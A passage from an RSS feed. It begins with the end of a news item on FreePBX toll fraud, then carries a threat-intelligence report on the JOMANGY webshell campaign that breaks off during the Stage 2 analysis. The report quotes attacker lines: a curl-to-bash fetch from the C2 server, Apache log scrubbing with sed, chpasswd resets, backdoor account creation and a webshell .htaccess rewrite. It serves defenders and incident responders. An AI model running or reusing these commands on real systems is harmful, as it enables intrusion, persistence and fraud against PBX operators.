<span data-contrast="auto">Unlike <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-ransomware-how-it-work/" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28391">ransomware</a> campaigns that generate immediate visibility, toll fraud operations provide cybercriminals with a quieter and more sustainable revenue stream by routing calls through premium-rate numbers or third-party fraud networks.</span>

<span data-contrast="auto">FreePBX systems remain particularly attractive targets because many organizations expose management interfaces directly to the internet while running outdated or poorly secured deployments.</span>

<span data-contrast="auto">According to data from the Shadowserver Foundation collected in early 2026, more than 900 FreePBX systems were actively compromised by related campaigns, while over 700 remained infected months after public disclosure and remediation guidance.</span>

<span data-contrast="auto">Researchers concluded that INJ3CTOR3 continues to evolve its tooling, infrastructure, and persistence techniques. The introduction of JOMANGY alongside the ZenharR malware toolkit demonstrates a highly mature threat operation specifically engineered for resilience, monetization, and long-term control over vulnerable FreePBX systems.</span>]]></content:encoded>
</item>
<item>
<title><![CDATA[JOMANGY: INJ3CTOR3’s Self-Healing FreePBX Toll Fraud Campaign]]></title>
<description><![CDATA[Executive Summary




Cyble Research & Intelligence Labs (CRIL) has identified an active FreePBX exploitation campaign, with high confidence tied to INJ3CTOR3, an actor with a documented history of targeting VoIP infrastructure for financial gain since 2019.


The campaign deploys a multi-stage B...]]></description>
<link>https://tsecurity.de/de/3536608/it-security-nachrichten/jomangy-inj3ctor3s-self-healing-freepbx-toll-fraud-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536608/it-security-nachrichten/jomangy-inj3ctor3s-self-healing-freepbx-toll-fraud-campaign/</guid>
<pubDate>Thu, 21 May 2026 15:54:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/05/blog-image-13.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="JOMANGY" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/05/blog-image-13.jpg 1200w, https://cyble.com/wp-content/uploads/2026/05/blog-image-13-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/05/blog-image-13-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/05/blog-image-13-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="JOMANGY: INJ3CTOR3's Self-Healing FreePBX Toll Fraud Campaign 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research &amp; Intelligence Labs (CRIL) has identified an active FreePBX exploitation campaign, with high confidence tied to INJ3CTOR3, an actor with a documented history of targeting VoIP infrastructure for financial gain since 2019.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The campaign deploys a multi-stage Bash dropper that introduces JOMANGY, a PHP webshell family with no prior public documentation, alongside <a href="https://unit42.paloaltonetworks.com/digium-phones-web-shell/">ZenharR</a>, previously attributed to the same actor lineage. Every deployed webshell instance carries live VoIP toll fraud code that routes calls through the victim's own SIP trunks at the victim's expense. A C2-hosted IP inventory of 3,080 addresses, assessed as scanner output from a co-located reconnaissance node, reflects the operational scale.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118812,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/01-1-1024x687.png" alt="" class="wp-image-118812"><figcaption class="wp-element-caption"><em>Figure 1 – Campaign Architecture</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The persistence architecture distinguishes this generation from prior INJ3CTOR3 campaigns. Six independent channels protect each other, spanning cron-based C2 polling, shell profile injection, immutable crontab backups, a process watchdog, chattr +i-protected webshell copies, and a self-reinstalling PHP executor. Any single surviving channel is enough to re-establish the full infection within minutes. Partial remediation is, by design, functionally useless.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The infection chain also drops 18 backdoor accounts across three tiers. Nine have UID-0 (root-equivalent) privileges, eight are service-tier OS accounts, and one is a FreePBX web panel account injected directly into MySQL. Account names are deliberately chosen to blend into the legitimate FreePBX service account inventory.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>JOMANGY</strong> is a PHP webshell family with no prior public documentation (this analysis being its first description). Every deployed instance uses double-layer obfuscation (base64 over ROT13) and carries the watermark string <em>'trace_e1ebf9066a951be519a24140711839ea', tying all campaign webshells back to a single </em>source.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The campaign establishes <strong>six independent persistence channels</strong> that protect each other: cron-based C2 polling every one to three minutes; shell profile injection firing on root login and reboot; eight chattr +i-immutable crontab backups protected by two separate restore cron loops; a process watchdog that respawns the beacon; chattr +i-protected webshell copies; and a PHP executor with its own cron reinstallation logic. Any single surviving channel re-establishes the full infection within minutes.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>18 backdoor accounts</strong> land across the infection chain in three tiers: nine UID-0 (root-equivalent) OS accounts, eight service-account-tier OS accounts, and one FreePBX web panel account injected directly into MySQL. Account names such as asterisk, asteriskuser, freepbxuser, and spamfilter are deliberately chosen to blend into the legitimate FreePBX service account inventory.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>All three deployed webshell instances carry live <strong>VoIP toll fraud code</strong> that places calls through the victim's own SIP trunks via asterisk -rx "channel originate Local/&lt;num&gt;@&lt;context&gt;". A C2-hosted <strong>IP address</strong> inventory (people2.txt, <strong>3,080</strong> entries, assessed as scanner output), with roughly 39% pointing at Alibaba Cloud-hosted infrastructure, highlights the operational scale.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The Stage 1 dropper evicts <strong>50+ webshell signatures</strong> and blocks 11 competitor C2 IPs bidirectionally, while simultaneously self-evicting every artifact from INJ3CTOR3's own January 2026 campaign, consistent with the operator migrating their active botnet from Brazilian to Dutch infrastructure between campaign generations.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>At the time of analysis, we were not able to recover the exploit payload and could not confirm the entry vector from artifacts alone. The artifacts point to two candidate CVEs with high confidence: <strong>CVE-2025-64328</strong> (FreePBX filestore module post-auth command injection, the documented prior-campaign entry vector) and <strong>CVE-2025-57819</strong> (FreePBX Endpoint module pre-auth SQL injection via cron_jobs, whose WatchTowr Labs PoC artifacts the Stage 1 dropper explicitly evicts).</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Six independent artifact overlaps (the unique marker string `bm2cjjnRXac1WW3KT7k6MKTR`, the INJ3CTOR3 actor name appearing explicitly as an eviction target, the prior C2 `45.234.176.202` in the iptables block list, shared binary names and file paths, the `newfpbx` UID-0 backdoor account, and the MySQL `ampusers` insertion pattern) with Fortinet's January 2026 encystPHP report tie this campaign to <strong>INJ3CTOR3</strong>, corroborated by Check Point Research (2020), Palo Alto Unit 42 (2022), and SANS ISC diary #32892 (2026-04-13). The C2 URL framework (/k.php, /z/wr.php, /z/post/root.php) has been in continuous operation since at least 2021.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>k.php </strong>(100259af)and<strong> wr.php </strong>(d40180f7) were <strong>absent</strong> from VirusTotal at the time of analysis. The primary <strong>dropper</strong> (b506fc82) had four detections across 76 engines. The operator actively rotates k.php content, which further degrades signature coverage over time.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Attribution</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We attribute the <strong>JOMANGY</strong> campaign to INJ3CTOR3 with high confidence based on the following:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The eviction routine names bm2cjjnRXac1WW3KT7k6MKTR as a grep target (the same unique marker Fortinet identified in the January 2026 encystPHP dropper) and also names INJ3CTOR3 directly as an eviction target in the same block.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The rest of the <a href="https://www.fortinet.com/de/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp">Fortinet</a> overlaps (prior C2 45[.]234[.]176[.]202 in the iptables block list, shared file paths and binary names, the newfpbx UID-0 backdoor, the MySQL ampusers pattern) confirm this. <a href="https://unit42.paloaltonetworks.com/digium-phones-web-shell/">Unit 42</a> documented the same ZenharR toolset and identical C2 URL structure against the same actor in 2022.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><a href="https://www.fortinet.com/de/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp">SANS ISC diary #32892</a> independently identified the current C2 and the shared password hash in April 2026. <a href="https://unit42.paloaltonetworks.com/digium-phones-web-shell/">Check Point Research</a> traced the same eviction targets, b3d0r and yokyok, to this actor's CVE-2019-19006 campaign in 2020.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>For anyone tracking this actor long-term, it is worth noting that Juba was explicitly deleted and evicted in the January 2026 dropper. Yet, the current Stage 1 resets its password without recreating the account.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>An operator working from someone else’s scripts would not know which dormant accounts to password-cycle. The motivation behind this is toll fraud, as in every generation of this campaign, since 2019. (See Figure 2)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118818,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/02-1024x238.png" alt="Figure 2 – JOMANGY Webshell Operator Panel" class="wp-image-118818"><figcaption class="wp-element-caption"><em>Figure 2 – JOMANGY Webshell Operator Panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Victimology and Target Profile</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The 3,080-IP inventory (people2.txt) is mostly APAC cloud: Alibaba Cloud, which spans China, Hong Kong, and Singapore, accounts for roughly 39%. The C2 was live during artifact collection, and the operator was actively updating the list between snapshots.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Elastix SQLite database theft (/var/www/db/acl.db) and the use of account names such as Issabel and Sangoma indicate that the operator is targeting every major PBX platform family across Latin America, Southeast Asia, and the Middle East.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The 2 in people2.txt likely implies an earlier version of the list exists somewhere. Across 3,080 assessed entries, this is assessed as automated mass exploitation rather than a targeted campaign. (See Figure 3)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118820,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/05/image-12.png" alt="Figure 3 – C2-hosted IP Inventory (people2.txt)" class="wp-image-118820"><figcaption class="wp-element-caption"><em>Figure 3 – C2-hosted IP Inventory (people2.txt)</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Background</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>VoIP toll fraud is one of the leading categories in a $41.82 billion global telecom fraud problem (CFCA, Global Fraud Loss Survey 2025 &amp; [9]) that rarely makes it into mainstream security coverage.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>FreePBX and Asterisk deployments have been a consistent target for financially motivated actors for most of the last decade. A FreePBX host with working SIP trunks gives an attacker direct access to the victim's carrier accounts and the ability to originate calls at will.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Toll fraud avoids the operational overhead of ransomware negotiations or finding a data buyer by having the operator route calls through premium-rate numbers (IPRNs) they control or sell capacity to third-party fraud networks and then have the victim's carrier send the bill.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Internet-exposed FreePBX management interfaces number globally in the tens of thousands, with a large fraction running end-of-life releases and minimal host hardening.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>INJ3CTOR3 has been exploiting this attack surface continuously since at least 2019. Check Point Research documented the actor's CVE-2019-19006 campaign in 2020. Palo Alto Unit 42 followed with a ZenharR-deploying generation targeting CVE-2021-45461 in 2022. Fortinet then covered the January 2026 encystPHP iteration operating from C2 45[.]234[.]176[.]202.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Shadowserver Foundation tracked over 900 FreePBX instances that were actively compromised as of February 2026 and were tied to that campaign. By May 2026 (five months after public disclosure), 700+ remained compromised across North America, Europe, Asia, South America, Africa, and Oceania. That number reflects how genuinely difficult these infections are to clear. (See Figure 4)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118823,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/04-1024x324.png" alt="Figure 4 – Dashboard Victim overview (shadowserver.org)" class="wp-image-118823"><figcaption class="wp-element-caption"><em>Figure 4 – Dashboard Victim overview (shadowserver.org)</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Shadowserver independently attributed the ongoing compromises to exploitation of CVE-2025-64328, the same CVE that emerges as a candidate for initial access in the current campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We collected the current generation in April 2026 from a Bash dropper still communicating with an active C2 at 45[.]95[.]147[.]178 (using artifacts from C2's web directory also referenced by <a href="https://isc.sans.edu/diary/32892">SANS ISC diary #32892</a>).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Initial Access Vector</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The earliest recovered artifact (Stage 1, b506fc82) is already executing on the victim system. No exploit payload or HTTP server access logs were recovered, so the initial entry point was not confirmed.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>However, two CVEs emerge as high-confidence candidates, each tied to a distinct forensic indicator in the samples.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Every stage from Stage 1 through the license.php executor includes a line that scrubs Apache httpd logs of entries containing the string "restapps" (sed -i '/restapps/d'). The JOMANGY webshell cleanup routine also explicitly targets file patterns associated with WatchTowr Labs' CVE-2025-57819 proof-of-concept.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Files matching *-watchTowr-*.php are searched for and deleted. Both patterns are confirmed in the sample. What they imply about the initial access vector is assessed, not confirmed. (See Figure 5)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118824,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/05-1024x101.png" alt="Figure 5 – Initial Access Suspects" class="wp-image-118824"><figcaption class="wp-element-caption"><em>Figure 5 – Initial Access Suspects</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2025-64328</strong> is a post-authentication command-injection vulnerability in the FreePBX filestore module, affecting versions 17.0.2.36 through 17.0.3, and patched in 17.0.3 (CVSS 8.6, <a href="https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw">FreePBX advisory</a>). CISA added it to the KEV (Known Exploited Vulnerabilities) catalog in February 2026 following Shadowserver Foundation reporting of approximately 900 compromised instances beginning in December 2025.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Fortinet documented CVE-2025-64328 as the entry vector for the January 2026 prior encystPHP campaign operating from C2 45[.]234[.]176[.]202, the same prior campaign whose artifacts the current dropper systematically evicts. That direct lineage makes it a strong candidate for campaign continuity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>There is a caveat, though. CVE-2025-64328 operates through the filestore module at HTTP path /admin/ajax.php?module=filestore&amp;command=testconnection.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The restapps log scrubbing present throughout every stage of the current campaign does not correspond to this module's exploitation path and therefore, cannot be read as evidence of CVE-2025-64328 here.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>That restapps log-scrubbing is better understood as a legacy behavioral artifact the actor has carried across every campaign generation since 2022, when CVE-2021-45461 (the Rest Phone Apps module RCE documented by <a href="https://unit42.paloaltonetworks.com/digium-phones-web-shell/">Unit 42</a>) served as the prior-generation entry vector and introduced ZenharR) persists as a carry-forward into the current campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This behavioral continuity is analytically useful for long-term actor tracking, but it does not constrain the current entry vector assessment. CVE-2025-64328 and CVE-2025-57819 remain the high-confidence candidates for the current campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2025-57819</strong> is a pre-authentication SQL injection vulnerability in the FreePBX Endpoint module. WatchTowr Labs <a href="https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/">documented</a> active exploitation beginning September 2025, through a mechanism that inserts a malicious entry into the Endpoint module's cron_jobs database table, causing FreePBX's internal scheduler to execute arbitrary OS commands at one-minute intervals, a mechanism architecturally identical to this campaign's own cron-persistence model (<a href="https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819">WatchTowr Labs CVE-2025-57819 proof-of-concept</a>).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The pre-authentication nature is consistent with mass automated exploitation across a 3,080-entry assessed target inventory. The architecture presents an additional indicator: the prior encystPHP dropper (71d94479) explicitly disabled the Endpoint module (<em>chmod 000 endpoint/ajax.php</em>) and (<em>fwconsole ma uninstall endpoint</em>, <em>fwconsole ma delete endpoint</em>). (See Figure 6)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118825,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/06-1024x278.png" alt="Figure 6 – Disable Endpoint Module (EncystPHP)" class="wp-image-118825"><figcaption class="wp-element-caption"><em>Figure 6 – Disable Endpoint Module (EncystPHP)</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The current campaign does not disable the Endpoint module. If CVE-2025-57819 was the entry vector, disabling the module eliminates the entry path itself. An operator who still needs the module active for exploitation would leave it running. Therefore, we treat this architectural inference as the strongest available evidence linking CVE-2025-57819 to the current campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Campaign Architecture and Staging</strong></h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The infection chain runs across three Bash payload stages, with license.php serving as a PHP executor component written to disk by those stages rather than fetched directly from the C2.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 1</strong> (b506fc82) is the initial Bash dropper where a concurrent re-run variant (/x) re-applies the same host-takeover behaviors on already-owned hosts and is treated as part of Stage 1 rather than a separate stage.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 2</strong> (k.php) deploys the JOMANGY webshell family and is the first one to write license.php to disk. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 3</strong> (wr.php, d40180f7) is a ZenharR dropper that forms a second cron download track running in parallel with k.php. wor.php (995e6304) is a second ZenharR dropper hosted at /z/wor.php on the C2.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It was recovered from the C2 artifact dump, but has no trigger identified in any executed payload in the recovered artifact chain. <strong>license.php</strong> is a PHP command executor invoked via the FreePBX HA hook; it executes between Stage 2 and Stage 3 in the chain, then again after Stage 3 rewrites it. (See Figure 1 for the campaign architecture flow)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Stage-by-Stage Payload Analysis</strong></h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 1: Bash Dropper (23,355 bytes, b506fc82)</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The dropper runs in a deliberate order. Competitor eviction goes first, followed by credential implantation and persistence installation, with log destruction last. Running eviction up front clears competing implants and defensive tooling before the operator's own infrastructure lands, shrinking the window where both sides' webshells coexist on the same host.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It deletes previously placed download artifacts (devnull24, devnull23, devnull2, and prior campaign iteration artifacts, as confirmed by naming patterns). Lines 15-19 handle two things in parallel:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>A blanket userdel loop which removes all non-root accounts with UID 0 or UID &gt;= 1000,</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>A MySQL INSERT establishes the FreePBX web panel backdoor for account freepbxusers with admin-level access (sections=*) and password SHA1 hash 6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Then it runs the bulk competitor webshell eviction, searching /var/www/html/ and /var/www/ for approximately 50 named webshell signatures and deleting matching PHP files. (See Figure 7)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118826,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/07-922x1024.png" alt="Figure 7 – Backdooring &amp; Webshell Eviction" class="wp-image-118826"><figcaption class="wp-element-caption"><em>Figure 7 – Backdooring &amp; Webshell Eviction</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Credential implantation</strong> runs in two tiers. Lines 262-264 decode and execute three base64-obfuscated useradd commands that create UID-0 accounts newfpbxs, newfpbx, and xhimax with the shared MD5-crypt password hash. Lines 292-298 create seven more UID-0 accounts in plaintext: centos, admin, support, issabel, sangoma, emo, and xhimax (a redundant second creation of xhimax).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It creates eight non-UID-0 accounts (sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint, asterisk, and hima), all sharing the same MD5-crypt password hash, and applies (Lines 312-321) the same hash to ten accounts, including root itself, via chpasswd -e. (See Figure 8)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118827,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/08-1024x368.png" alt="Figure 8 – Credential Implantation" class="wp-image-118827"><figcaption class="wp-element-caption"><em>Figure 8 – Credential Implantation</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Stage 1 installs persistence across two active tracks. The first is recurring cron polling of k.php every one to three minutes. The second is a shell profile stager appended to /root/.bash_profile, /root/.bashrc, and /etc/rc.local, which run on every root login and system reboot.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Lines 272-278 also execute a one-time phone-home to the C2 root index (http://45[.]95[.]147[.]178/) immediately on first run, separate from the cron infrastructure and effective even if the cron subsystem is blocked at execution time.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The active crontab is written to eight hidden, chattr +i-immutable backup paths using system-mimicking directory names, protected by two independent restore loops and a process watchdog.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Stage 1 deploys no webshells. That work is deferred entirely to Stage 2, an intentional departure from the prior encystPHP generation, which wrote the webshell directly from the initial dropper.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The full per-channel breakdown (including <strong>self-healing</strong> mechanism) is covered in the Persistence Mechanisms section below. (See Figure 9)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118829,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/09-1024x73.png" alt="Figure 9 – Cron Polling for k.php" class="wp-image-118829"><figcaption class="wp-element-caption">Figure 9 – Cron Polling for k.php</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The dropper closes with SSH hardening and log wiping. (See Figure 10)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118830,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/10-1024x163.png" alt="Figure 10 – SSH Hardening &amp; Log Wipe" class="wp-image-118830"><figcaption class="wp-element-caption"><em>Figure 10 – SSH Hardening &amp; Log Wipe</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 2: k.php (100259af, approximately 45KB, Bash)</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It opens by fetching and executing /x via curl (curl http://45[.]95[.]147[.]178/x -ks | bash), re-applying the Stage 1 host-takeover behaviors before any webshell deployment begins.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Line 3 decodes a base64 blob and writes it to <em>/var/www/html/admin/views/ajax.php</em>, the FreePBX admin AJAX endpoint, and a high-traffic legitimate file that provides cover for the webshell.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Lines 15-25 copy the same blob to more than ten additional paths across the FreePBX web tree, including /var/www/html/h.php, /var/www/html/rest_phones/ajax.php, /var/www/html/admin/modules/h/ (ajax.php, config.php, index.php), and subdirectories under fpbxphones/ and phones/.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Lines 27-28 write an .htaccess rewrite rule (RewriteEngine On; RewriteRule .* config.php), so any request to an unrecognized path within those directories lands on a webshell copy.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Lines 7-8 reinstall the MySQL ampusers backdoor using the same DELETE + INSERT pattern as Stage 1, replanting the freepbxusers web panel account every time k.php executes.</p>
